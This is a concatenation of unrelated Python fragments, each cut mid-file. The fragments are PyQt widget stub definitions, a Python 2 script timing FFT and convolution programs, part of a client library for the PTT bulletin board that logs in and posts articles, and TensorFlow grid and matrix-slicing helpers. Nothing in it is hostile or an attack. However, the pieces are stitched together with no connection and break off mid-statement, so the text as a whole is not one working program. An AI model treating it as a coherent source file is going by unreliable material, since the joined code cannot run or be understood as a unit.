def width(*args, **kwargs):
pass
def window(*args, **kwargs):
pass
def windowFilePath(*args, **kwargs):
pass
def windowFlags(*args, **kwargs):
pass
def windowHandle(*args, **kwargs):
pass
def windowIcon(*args, **kwargs):
pass
def windowIconText(*args, **kwargs):
pass
def windowModality(*args, **kwargs):
pass
def windowOpacity(*args, **kwargs):
pass
def windowRole(*args, **kwargs):
pass
def windowState(*args, **kwargs):
pass
def windowTitle(*args, **kwargs):
pass
def windowType(*args, **kwargs):
pass
def x(*args, **kwargs):
pass
def y(*args, **kwargs):
pass
def createWindowContainer(*args, **kwargs):
pass
def instanceCounter(*args, **kwargs):
pass
def instanceOperationsCounter(*args, **kwargs):
pass
def keyboardGrabber(*args, **kwargs):
pass
def mouseGrabber(*args, **kwargs):
pass
def setTabOrder(*args, **kwargs):
pass
DrawChildren = None
DrawWindowBackground = None
IgnoreMask = None
RenderFlag = None
RenderFlags = None
__new__ = None
customContextMenuRequested = None
staticMetaObject = None
windowIconChanged = None
windowIconTextChanged = None
windowTitleChanged = None
class QListWidgetItem(_Object):
def __eq__(*args, **kwargs):
"""
x.__eq__(y) <==> x==y
"""
pass
def __ge__(*args, **kwargs):
"""
x.__ge__(y) <==> x>=y
"""
pass
def __gt__(*args, **kwargs):
"""
x.__gt__(y) <==> x>y
"""
pass
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def __le__(*args, **kwargs):
"""
x.__le__(y) <==> x<=y
"""
pass
def __lshift__(*args, **kwargs):
"""
x.__lshift__(y) <==> x<<y
"""
pass
def __lt__(*args, **kwargs):
"""
x.__lt__(y) <==> x<y
"""
pass
def __ne__(*args, **kwargs):
"""
x.__ne__(y) <==> x!=y
"""
pass
def __rlshift__(*args, **kwargs):
"""
x.__rlshift__(y) <==> y<<x
"""
pass
def __rrshift__(*args, **kwargs):
"""
x.__rrshift__(y) <==> y>>x
"""
pass
def __rshift__(*args, **kwargs):
"""
x.__rshift__(y) <==> x>>y
"""
pass
def background(*args, **kwargs):
pass
def backgroundColor(*args, **kwargs):
pass
def checkState(*args, **kwargs):
pass
def clone(*args, **kwargs):
pass
def data(*args, **kwargs):
pass
def flags(*args, **kwargs):
pass
def font(*args, **kwargs):
pass
def foreground(*args, **kwargs):
pass
def icon(*args, **kwargs):
pass
def isHidden(*args, **kwargs):
pass
def isSelected(*args, **kwargs):
pass
def listWidget(*args, **kwargs):
pass
def read(*args, **kwargs):
pass
def setBackground(*args, **kwargs):
pass
def setBackgroundColor(*args, **kwargs):
pass
def setCheckState(*args, **kwargs):
pass
def setData(*args, **kwargs):
pass
def setFlags(*args, **kwargs):
pass
def setFont(*args, **kwargs):
pass
def setForeground(*args, **kwargs):
pass
def setHidden(*args, **kwargs):
pass
def setIcon(*args, **kwargs):
pass
def setSelected(*args, **kwargs):
pass
def setSizeHint(*args, **kwargs):
pass
def setStatusTip(*args, **kwargs):
pass
def setText(*args, **kwargs):
pass
def setTextAlignment(*args, **kwargs):
pass
def setTextColor(*args, **kwargs):
pass
def setToolTip(*args, **kwargs):
pass
def setWhatsThis(*args, **kwargs):
pass
def sizeHint(*args, **kwargs):
pass
def statusTip(*args, **kwargs):
pass
def text(*args, **kwargs):
pass
def textAlignment(*args, **kwargs):
pass
def textColor(*args, **kwargs):
pass
def toolTip(*args, **kwargs):
pass
def type(*args, **kwargs):
pass
def whatsThis(*args, **kwargs):
pass
def write(*args, **kwargs):
pass
ItemType = None
Type = None
UserType = None
__new__ = None
class QStyleFactory(_Object):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def create(*args, **kwargs):
pass
def keys(*args, **kwargs):
pass
__new__ = None
class QStylePainter(_QPainter):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def begin(*args, **kwargs):
pass
def drawComplexControl(*args, **kwargs):
pass
def drawControl(*args, **kwargs):
pass
def drawItemPixmap(*args, **kwargs):
pass
def drawItemText(*args, **kwargs):
pass
def drawPrimitive(*args, **kwargs):
pass
def style(*args, **kwargs):
pass
__new__ = None
class QButtonGroup(_QObject):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def addButton(*args, **kwargs):
pass
def button(*args, **kwargs):
pass
def buttons(*args, **kwargs):
pass
def checkedButton(*args, **kwargs):
pass
def checkedId(*args, **kwargs):
pass
def exclusive(*args, **kwargs):
pass
def id(*args, **kwargs):
pass
def removeButton(*args, **kwargs):
pass
def setExclusive(*args, **kwargs):
pass
def setId(*args, **kwargs):
pass
__new__ = None
buttonClicked = None
buttonPressed = None
buttonReleased = None
buttonToggled = None
staticMetaObject = None
class QGraphicsAnchor(_QObject):
def setSizePolicy(*args, **kwargs):
pass
def setSpacing(*args, **kwargs):
pass
def sizePolicy(*args, **kwargs):
pass
def spacing(*args, **kwargs):
pass
def unsetSpacing(*args, **kwargs):
pass
staticMetaObject = None
class QTableWidgetItem(_Object):
def __eq__(*args, **kwargs):
"""
x.__eq__(y) <==> x==y
"""
pass
def __ge__(*args, **kwargs):
"""
x.__ge__(y) <==> x>=y
"""
pass
def __gt__(*args, **kwargs):
"""
x.__gt__(y) <==> x>y
"""
pass
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def __le__(*args, **kwargs):
"""
x.__le__(y) <==> x<=y
"""
pass
def __lshift__(*args, **kwargs):
"""
x.__lshift__(y) <==> x<<y
"""
pass
def __lt__(*args, **kwargs):
"""
x.__lt__(y) <==> x<y
"""
pass
def __ne__(*args, **kwargs):
"""
x.__ne__(y) <==> x!=y
"""
pass
def __rlshift__(*args, **kwargs):
"""
x.__rlshift__(y) <==> y<<x
"""
pass
def __rrshift__(*args, **kwargs):
"""
x.__rrshift__(y) <==> y>>x
"""
pass
def __rshift__(*args, **kwargs):
"""
x.__rshift__(y) <==> x>>y
"""
pass
def background(*args, **kwargs):
pass
def backgroundColor(*args, **kwargs):
pass
def checkState(*args, **kwargs):
pass
def clone(*args, **kwargs):
pass
def column(*args, **kwargs):
pass
def data(*args, **kwargs):
pass
def flags(*args, **kwargs):
pass
def font(*args, **kwargs):
pass
def foreground(*args, **kwargs):
pass
def icon(*args, **kwargs):
pass
def isSelected(*args, **kwargs):
pass
def read(*args, **kwargs):
pass
def row(*args, **kwargs):
pass
def setBackground(*args, **kwargs):
pass
def setBackgroundColor(*args, **kwargs):
pass
def setCheckState(*args, **kwargs):
pass
def setData(*args, **kwargs):
pass
def setFlags(*args, **kwargs):
pass
def setFont(*args, **kwargs):
pass
def setForeground(*args, **kwargs):
pass
def setIcon(*args, **kwargs):
pass
def setSelected(*args, **kwargs):
pass
def setSizeHint(*args, **kwargs):
pass
def setStatusTip(*args, **kwargs):
pass
def setText(*args, **kwargs):
pass
def setTextAlignment(*args, **kwargs):
pass
def setTextColor(*args, **kwargs):
pass
def setToolTip(*args, **kwargs):
pass
def setWhatsThis(*args, **kwargs):
pass
def sizeHint(*args, **kwargs):
pass
def statusTip(*args, **kwargs):
pass
def tableWidget(*args, **kwargs):
pass
def text(*args, **kwargs):
pass
def textAlignment(*args, **kwargs):
pass
def textColor(*args, **kwargs):
pass
def toolTip(*args, **kwargs):
pass
def type(*args, **kwargs):
pass
def whatsThis(*args, **kwargs):
pass
def write(*args, **kwargs):
pass
ItemType = None
Type = None
UserType = None
__new__ = None
class QMouseEventTransition(_QtCore.QEventTransition):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def button(*args, **kwargs):
pass
def eventTest(*args, **kwargs):
pass
def hitTestPath(*args, **kwargs):
pass
def modifierMask(*args, **kwargs):
pass
def onTransition(*args, **kwargs):
pass
def setButton(*args, **kwargs):
pass
def setHitTestPath(*args, **kwargs):
pass
def setModifierMask(*args, **kwargs):
pass
__new__ = None
staticMetaObject = | |
#!/usr/bin/python
# a timing script for FFTs and convolutions using OpenMP
import sys, getopt
import numpy as np
from math import *
from subprocess import * # for popen, running processes
import os
import re # regexp package
import shutil
def mvals_from_file(filename):
mvals = []
if os.path.isfile(filename):
with open(filename, 'r') as fin:
for line in fin:
if not line.startswith("#"):
mvals.append(int(line.split()[0]))
return mvals
def max_m(p, RAM, runtype):
print "program:", p
print "runtype:", runtype
print "ram:", RAM
b = 0
if "transpose" in p:
# NB: assumes Z=1 and out-of-place
return int(floor(log(RAM / 32) / log(2) / 2))
if "cconv2" in p:
if runtype == "implicit":
# A * 2m^2 * 16
return int(floor(log(RAM / 64) / ( 2 * log(2)) ))
else:
# A * 4m^2 * 16
return int(floor(log(RAM / 128) / (2 * log(2)) ))
if "cconv3" in p:
if runtype == "implicit":
# A * 2m^3 * 16
return int(floor( log(RAM / 64) / (3 * log(2)) ))
else:
# A * 8m^3 * 16
return int(floor( log(RAM / 256) / (3 * log(2)) ))
if "cconv" in p:
b = int(floor(log(RAM / 4) / log(2)))
b = min(b, 20) # because we aren't crazy
return b
if "tconv2" in p:
if runtype == "implicit":
# A * 6m^2 * 16
return int(floor( log(RAM / 192) / (2 * log(2)) ))
else:
# A * 12m^2 * 16
return int(floor( log(RAM / 768) / (2 * log(2)) ))
if "tconv" in p:
b = int(floor(log(RAM / 6) / log(2)))
b = min(b, 20) # because we aren't crazy
return b
if "conv2" in p:
if runtype == "implicit":
# A * 3 m^2 * 16
return int(floor(log(RAM / 96) / (2 * log(2)) ))
else:
# A * 4.5 m^2 * 16
return int(floor(log(RAM / 144) / (2 * log(2)) ))
if "conv3" in p:
# A * 6 m^3 * 16
return int(floor(log(RAM / 192) / (3 * log(2)) ))
if "conv" in p:
b = int(floor(log(RAM / 6) / log(2)))
b = min(b, 20) # because we aren't crazy
return b
if "mft1" in p:
return int(floor(0.5 * log(RAM / 64) / log(2)))
if "fft1" in p:
return int(floor(0.5 * log(RAM / 64) / log(2)))
if p == "fft2":
return int(floor(log(RAM / 32) / log(2) / 2))
if p == "fft2r":
return int(floor(log(RAM / 32) / log(2) / 2))
if p == "fft3":
return int(floor(log(RAM / 32) / log(2) / 3))
if p == "fft3r":
return int(floor(log(RAM / 32) / log(2) / 3))
if p == "transpose":
return int(floor(log(RAM / 32) / log(2) / 2))
print "Error! Failed to determine b."
return 0
def default_outdir(p):
outdir=""
if p == "cconv":
outdir = "timings1c"
if p == "cconv2":
outdir = "timings2c"
if p == "cconv3":
outdir = "timings3c"
if p == "conv":
outdir = "timings1r"
if p == "conv2":
outdir = "timings2r"
if p == "conv3":
outdir = "timings3r"
if p == "tconv":
outdir = "timings1t"
if p == "tconv2":
outdir="timings2t"
if p == "fft1":
outdir = "timingsf1"
if p == "mfft1":
outdir = "timingsmf1"
if p == "fft2":
outdir = "timingsf2"
if p == "transpose":
outdir="transpose2"
return outdir
def main(argv):
usage = '''Usage:
\ntimings.py
-a<start>
-b<stop>
-p<cconv,cconv2,cconv3,conv,conv2,conv3,tconv,tconv2>
-T<number of threads>
-A<quoted arg list for timed program>
-B<pre-commands (eg srun)>
-r<implicit/explicit/pruned/fft>
-R<ram in gigabytes>
-d dry run
-o<output file name>
-D<outdir>
-o<outfile>
-P<path to executable>
-g<grep string>
-N<int> Number of tests to perform
-e<0 or 1>: append to the timing data already existent (skipping
already-done problem sizes).
-c<string>: extra commentary for output file.
-v: verbose output
'''
dryrun = False
#dryrun = True
bset = 0
dorun = True
T = 0 # number of threads
p = "" # program name
B = [] # precommands
A = [] # postcommands
E = [] # environment variables (eg: -EGOMP_CPU_AFFINITY -E"0 1 2 3")
a = 6 # minimum log of problem size
b = 0 # maximum log of problem size
runtype = "implicit" # type of run
RAM = 0 # ram limit in GB
outdir = "" # output directory
outfile = "" # output filename
rname = "" # output grep string
N = 0 # number of tests
appendtofile = False
stats = 0
path = "./"
verbose = False
extracomment = ""
try:
opts, args = getopt.getopt(argv,"hdp:T:a:b:c:A:B:E:e:r:R:S:o:P:D:g:N:v")
except getopt.GetoptError:
print "error in parsing arguments."
print usage
sys.exit(2)
for opt, arg in opts:
if opt in ("-p"):
p = arg
if opt in ("-T"):
T = arg
elif opt in ("-a"):
a = int(arg)
elif opt in ("-N"):
N = int(arg)
elif opt in ("-b"):
b = int(arg)
elif opt in ("-c"):
extracomment = arg
elif opt in ("-A"):
A += [str(arg)]
elif opt in ("-B"):
B += [str(arg)]
elif opt in ("-E"):
E += [str(arg)]
elif opt in ("-e"):
appendtofile = (int(arg) == 1)
elif opt in ("-r"):
runtype = str(arg)
elif opt in ("-R"):
print "ram arg:", arg
RAM = float(arg)*2**30
elif opt in ("-S"):
stats = int(arg)
elif opt in ("-d"):
dryrun = True
elif opt in ("-o"):
outfile = str(arg)
elif opt in ("-P"):
path = arg
elif opt in ("-D"):
outdir = str(arg)
elif opt in ("-g"):
rname = str(arg)
elif opt in ("-v"):
verbose = True
elif opt in ("-h"):
print usage
sys.exit(0)
if dryrun:
print "Dry run! No output actually created."
if p == "":
print "please specify a program with -p"
print usage
sys.exit(2)
print "RAM:", RAM
# if both the max problem size and the ram are unset, go up to 2^8
if (b == 0 and RAM == 0):
b = 8
hermitian = False
ternary = False
if p == "cconv":
if(runtype == "pruned"):
print p + " has no pruned option"
dorun = False
if p == "conv":
hermitian = True
if(runtype == "pruned"):
print p + " has no pruned option"
dorun = False
if p == "conv2":
hermitian = True
if p == "conv3":
hermitian = True
if(runtype != "implicit"):
print p + " has no " + r + " option"
dorun = False
if p == "tconv":
ternary = True
if(runtype == "pruned"):
print p + " has no pruned option"
dorun = False
if p == "tconv2":
ternary = True
if p == "fft1":
runtype = "fft"
if p == "mfft1":
runtype = "fft"
if p == "fft2":
runtype = "fft"
if p == "transpose":
runtype = "transpose"
if outdir == "":
outdir = default_outdir(p)
if outdir == "":
print "empty outdir: please select a program or specify an outdir (-D)"
print
print usage
sys.exit(2)
if RAM != 0:
b = max_m(p, RAM, runtype)
print "max value of b with ram provided:", b
if outfile == "":
outfile = "implicit"
goodruns = []
badruns = []
if dorun:
if RAM != 0:
print "max problem size is "+str(2**b)
if rname == "":
if runtype == "implicit":
rname = "Implicit"
if runtype == "explicit":
rname = "Explicit"
if runtype == "pruned":
rname = "rune"
if runtype == "fft":
rname = "fft"
if runtype == "transpose":
rname = "transpose"
print "Search string for timing: " + rname
filename = outdir + "/" + outfile
print "output in", filename
mdone = mvals_from_file(filename)
print "problem sizes already done:", mdone
print "environment variables:", E
if not dryrun:
os.system("mkdir -p " + outdir)
with open(outdir + "/log", "a") as logfile:
logfile.write(str(sys.argv))
logfile.write("\n")
logfile.write("intial exponent: " + str(a) + "\n")
logfile.write("final exponent: " + str(b) + "\n")
if not appendtofile:
os.system("rm -f " + filename)
cmd = []
i = 0
while i < len(B):
cmd.append(B[i]);
i += 1
cmd += [path + str(p)]
if not os.path.isfile(path + str(p)):
| |
+ ' 系統負荷過重,重新執行連線',
'為避免系統負荷過重, 請稍後再試',
_ResponseUnit(' ', False),
BreakDetect=True,
ErrCode = ErrorCode.WaitTimeout
),
_DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 更新與同步線上使用者及好友名單',
'更新與同步線上使用者及好友名單',
_ResponseUnit('\x1b\x4fD\x1b\x4fD', False)
),
_DetectUnit(
KickMsg,
'刪除其他重複登入的連線',
_ResponseUnit(KickResponse, True)
),
_DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 刪除錯誤嘗試紀錄',
'您要刪除以上錯誤嘗試的記錄嗎',
_ResponseUnit('y\r', False)
),
_DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 登入成功',
'我是' + self.__ID,
_ResponseUnit(' ', False),
BreakDetect=True,
),
_DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 輸入密碼',
'請輸入您的密碼:',
_ResponseUnit(self.__Password + '\r', False)
),
_DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 輸入帳號',
'請輸入代號,或以 guest 參觀,或以 new 註冊:',
_ResponseUnit(self.__ID + '\r', False)
),
self.__PTTBUGDetectUnit
]
LoginFailCount = 0
MaxLoginFail = 2
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('登入超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
self.Log('登入操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__ErrorCode = ErrCode
return ErrCode
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
LoginFailCount = 0
self.Log(DetectTarget.getDisplayMsg())
if '郵件已滿' in DetectTarget.getDisplayMsg():
self.__isMailBoxFull = True
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
isDetectedTarget = True
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
if not isDetectedTarget:
if LoginFailCount < MaxLoginFail:
self.Log('頻道 ' + str(ConnectIndex) + ' 讀取 PTT 畫面..')
Refresh = True
LoginFailCount += 1
SendMessage = ''
continue
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
if ErrCode == ErrorCode.WaitTimeout:
Retry = True
elif ErrCode != ErrorCode.Success:
self.__ErrorCode = ErrCode
return ErrCode
if '> (' in self.__ReceiveData[ConnectIndex]:
self.Log('新式游標模式', LogLevel.DEBUG)
self.__Cursor = '>'
self.__isConnected[ConnectIndex] = True
elif '●(' in self.__ReceiveData[ConnectIndex]:
self.Log('舊式游標模式', LogLevel.DEBUG)
self.__Cursor = '●'
self.__isConnected[ConnectIndex] = True
else:
self.Log('頻道 ' + str(ConnectIndex) + ' 無法偵測游標。重新執行連線')
# return ErrorCode.UnknowError
return ErrorCode.Success
def login(self, ID='', Password=''):
self.__IdleTime = 0
if ID != '':
self.__ID = ID
if Password != '':
self.__Password = Password
ErrCode = self.__connectRemote(0)
if ErrCode == ErrorCode.Success:
self.__IdleThread = threading.Thread(target=self.__AntiLogout)
self.__IdleThread.start()
self.__ErrorCode = ErrCode
return ErrCode
def logout(self):
ConnectIndex = -1
self.__IdleTime = 0
self.__RunIdleThread = False
if ConnectIndex == -1:
self.Log('準備登出所有頻道')
for index in range(self.__MaxMultiLogin):
self.__isConnected[index] = False
for index in range(self.__MaxMultiLogin):
if self.__ConnectList[index] == None:
continue
self.Log('頻道 ' + str(index) + ' 登出', LogLevel.DEBUG)
SendMessage = self.__gotoMainMenu + ' g\ry\r'
ErrCode, CatchIndex = self.__operatePTT(index, SendMessage=SendMessage)
self.Log('頻道 ' + str(index) + ' 登出成功')
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode
def __getNewestPostIndex(self, Board, ConnectIndex=0, Search='', Author=''):
result = 0
CatchList = [
# 0
'文章選讀',
]
# SendMessage = '\x1b\x4fD\x1b\x4fD\x1b\x4fDqs' + Board + '\r\x03\x03 0\r$'
SendMessage = self.__gotoMainMenu + 'qs' + Board + '\r\x03\x03 '
if Author != '':
SendMessage += 'a' + Author + '\r'
if Search != '':
SendMessage += '/' + Search + '\r'
SendMessage += '0\r$'
Refresh = True
ExtraWait = 0
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=Refresh, ExtraWait=ExtraWait)
if ErrCode != ErrorCode.Success:
self.__ErrorCode = ErrCode
return ErrCode, result
# print(self.__ReceiveData[ConnectIndex])
ReceiveDataLines = self.__ReceiveData[ConnectIndex].split('\n')
ReceiveDataLines = ReceiveDataLines[2:-1]
self.__ReceiveData[ConnectIndex] = '\n'.join(ReceiveDataLines)
self.__ReceiveData[ConnectIndex] = self.__ReceiveData[ConnectIndex][:self.__ReceiveData[ConnectIndex].find('★ ')]
AllIndex = re.findall(r'\d+ ', self.__ReceiveData[ConnectIndex])
if len(AllIndex) == 0:
ErrCode = ErrorCode.UnknowError
self.__ErrorCode = ErrCode
return ErrCode, result
AllIndex = list(set(map(int, AllIndex)))
AllIndex.sort(reverse=True)
# print(AllIndex)
for IndexTemp in AllIndex:
# 確認是否連續 只有文章編號才可能連續
isContinue = True
for i in range(1, 3):
if str(IndexTemp - i) not in self.__ReceiveData[ConnectIndex]:
isContinue = False
break
if isContinue:
result = IndexTemp
break
if result == 0:
ErrCode = ErrorCode.ParseError
self.__ErrorCode = ErrCode
return ErrCode, result
# 確認是否有因為上篇文章是數字結尾導致判斷錯誤的情況
for i in range(1, 20):
if str(result + 1) in self.__ReceiveData[ConnectIndex]:
result += 1
else:
break
SendMessage = self.__gotoMainMenu + 'qs' + Board + '\r\x03\x03 ' + str(result) + '\rQ'
Refresh = True
isBreakDetect = False
# 先後順序代表偵測的優先順序
DetectTargetList = [
_DetectUnit(
'取得可閱讀文章',
'文章代碼',
_ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
_DetectUnit(
'取得可閱讀文章',
'文章網址',
_ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
_DetectUnit(
'取得可閱讀文章',
'這一篇文章值',
_ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
_DetectUnit(
'',
'請按任意鍵繼續',
_ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.UnknowError
),
self.__PTTBUGDetectUnit
]
ShowFixResult = False
for TryResult in range(result, result - 100, -1):
FindResult = False
#self.Log('Try: ' + Board + ' ' + str(TryResult))
SendMessage = '\x1b\x4fD\x1b\x4fD\x1b\x4fDqs' + Board + '\r\x03\x03 ' + str(TryResult) + '\rQ'
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('登入超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
self.Log('登入操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__ErrorCode = ErrCode
return ErrCode
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
if ShowFixResult:
self.Log(DetectTarget.getDisplayMsg())
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
isDetectedTarget = True
if DetectTarget.isBreakDetect():
self.__isConnected[ConnectIndex] = True
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
if result != TryResult:
if ShowFixResult:
self.Log('修正結果為 ' + str(TryResult), LogLevel.DEBUG)
result = TryResult
FindResult = True
else:
ShowFixResult = True
break
if not isDetectedTarget:
continue
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
# self.Log('無法解析的狀態! PTT Library 緊急停止')
# sys.exit()
if FindResult:
break
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode, result
def post(self, Board, Title, Content, PostType, SignType):
ConnectIndex = 0
self.__IdleTime = 0
if not self.__APICheck():
return self.__ErrorCode
try:
Board = str(Board)
Title = str(Title)
Content = str(Content)
PostType = int(PostType)
SignType = int(SignType)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
# 前進至板面
self.__APILock[ConnectIndex].acquire()
if '看板《' + Board + '》' in self.__ReceiveData[ConnectIndex] and '文章選讀' in self.__ReceiveData[ConnectIndex]:
self.Log('已經位於 ' + Board + ' 板', LogLevel.DEBUG)
else:
CatchList = [
# 0
'文章選讀',
]
SendMessage = '\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fDqs' + Board + '\r\x03\x03 '
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=True)
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
if CatchIndex == -1:
self.Log('前進至 ' + Board + '板失敗')
print(self.__ReceiveData[ConnectIndex])
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.UnknowError
self.__ErrorCode = ErrCode
return ErrCode
# 確認是否有發文權限
CatchList = [
# 0
'或不選',
# 1
'使用者不可發言',
]
SendMessage = '\x10'
Refresh = False
ExtraWait = 0
Retry = False
RetryCount = 0
while True:
if Retry:
Retry = False
RetryCount += 1
if RetryCount == 3:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
else:
RetryCount = 0
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=Refresh, ExtraWait=ExtraWait)
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
SendMessage = ' '
Refresh = False
ExtraWait = 0
if CatchIndex == 0:
self.Log('具備發文權限', LogLevel.DEBUG)
break
elif CatchIndex == 1:
self.Log('你被水桶惹 QQ')
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.NoPermission
self.__ErrorCode = ErrCode
return ErrCode
else:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex, _LogLevel=LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.UnknowError
self.__ErrorCode = ErrCode
return ErrCode
SendMessage = str(PostType) + '\r' + str(Title) + '\r' + str(Content) + '\x18'
self.Log('送出文章', LogLevel.DEBUG)
Refresh = True
ExtraWait = 0
CatchList = [
# 0
'確定要儲存檔案嗎',
]
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=Refresh, ExtraWait=ExtraWait)
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
if CatchIndex == 0:
self.Log('儲存檔案', LogLevel.DEBUG)
SendMessage = 's\r'
else:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex, _LogLevel=LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.UnknowError
self.__ErrorCode = ErrCode
return ErrCode
CatchList = [
# 0
'任意鍵繼續',
# 1
'x=隨機',
# 2
'文章選讀',
]
Refresh = True
ExtraWait = 0
while True:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=Refresh, ExtraWait=ExtraWait)
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
if CatchIndex == 0:
break
elif CatchIndex == 1:
self.Log('選擇簽名檔: ' + str(SignType), LogLevel.DEBUG)
SendMessage = str(SignType) + '\r'
elif CatchIndex == 2:
break
else:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex, _LogLevel=LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.UnknowError
self.__ErrorCode = ErrCode
return ErrCode
self.__WaterBallProceeor()
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode
def gotoBoard(self, Board):
ConnectIndex = 0
SendMessage = ''
if '看板《' + Board + '》' in self.__ReceiveData[ConnectIndex] and '文章選讀' in self.__ReceiveData[ConnectIndex]:
self.Log('已經位於 ' + Board + ' 板', LogLevel.DEBUG)
else:
# 前進至板面
SendMessage += '\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fDqs' + Board + '\r\x03\x03 '
CatchList = []
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=True)
if ErrCode != ErrorCode.Success:
self.Log('前往看板' + Board + '失敗')
self.__ErrorCode = ErrCode
return ErrCode
else:
self.Log('前往看板' + Board + '成功!!!')
def gotoArticle(self, PostIndex=0):
ConnectIndex = 0
self.Log('前往文章前')
| |
0])), perm=[1, 0]),
name=name)
return z_batch
def simple_grid(self, grid=None):
""" This function creates simple grid meshes
Note: this function returns np.ndarray
:param grid:
:return:
"""
if self.D != 2:
raise AttributeError('Code length has to be two')
if grid is None:
grid = np.array([[-1.0, 1.0], [-1.0, 1.0]], dtype=np.float32)
x = np.linspace(grid[0][0], grid[0][1], self.mesh_num[0])
y = np.linspace(grid[1][0], grid[1][1], self.mesh_num[1])
z0 = np.reshape(np.transpose(np.tile(x, (self.mesh_num[1], 1))), [-1, 1])
z1 = np.reshape(np.tile(y, (1, self.mesh_num[0])), [-1, 1])
z = np.concatenate((z0, z1), axis=1)
return z, x, y
def j_diagram(self, name=None):
""" This function creates a j diagram using slerp
This function is not finished as there is a problem with the slerp idea.
:param name:
:return:
"""
raise NotImplementedError('This function has not been implemented.')
# z_support = np.random.randn(4, self.D)
# z0 = tf.expand_dims(z_support[0], axis=0) # create 1-by-D vector
# z1 = tf.expand_dims(z_support[1], axis=0)
# z2 = tf.expand_dims(z_support[2], axis=0)
# pass
########################################################################
def mat_slice(mat, row_index, col_index=None, name='slice'):
""" This function gets mat[index, index] where index is either bool or int32.
Note that:
if index is bool, output size is typically smaller than mat unless each element in index is True
if index is int32, output can be any size.
:param mat:
:param row_index:
:param col_index:
:param name;
:return:
"""
if col_index is None:
col_index = row_index
with tf.name_scope(name):
